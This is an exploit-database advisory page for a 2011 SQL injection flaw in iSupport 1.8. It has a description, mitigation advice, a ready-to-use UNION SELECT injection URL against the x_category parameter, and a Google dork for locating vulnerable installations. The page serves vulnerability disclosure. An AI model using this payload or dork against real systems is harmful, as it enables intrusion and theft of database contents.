header-logo
Suggest Exploit
vendor:
iSupport
by:
Brendan Coles
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: iSupport
Affected Version From: 1.8
Affected Version To: 1.8
Patch Exists: N/A
Related CWE: N/A
CPE: a:idevspot:isupport:1.8
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

iSupport 1.8 SQL Injection Vulnerability

iSupport version 1.8 is vulnerable to SQL injection. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This request contains malicious SQL statements that are executed in the backend database. This can allow an attacker to gain access to sensitive information such as usernames, passwords, and other sensitive data stored in the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL statements. Additionally, parameterized queries should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

iSupport 1.8 SQL Injection Vulnerability

# Date: 2011-06-23
# Author: Brendan Coles <bcoles@gmail.com>
# Advisory: http://itsecuritysolutions.org/2011-06-23-iSupport-1.8-SQL-Injection-Vulnerability/

# Software: iSupport
# Version: <= 1.8
# Homepage: http://www.idevspot.com/iSupport.php
# Google Dork: "Powered by [ iSupport 1.8 ]"

# Vendor: idevSpot
# Homepage: http://www.idevspot.com/
# Notified: Unnotified

# SQL Injection:

http://localhost/[PATH]/index.php?include_file=knowledgebase_list.php&x_category=null union select null,concat(user(),0x3a,database(),0x3a,@@datadir),null,null,null,null--

Navigation

Suggest Exploit

Services By CQR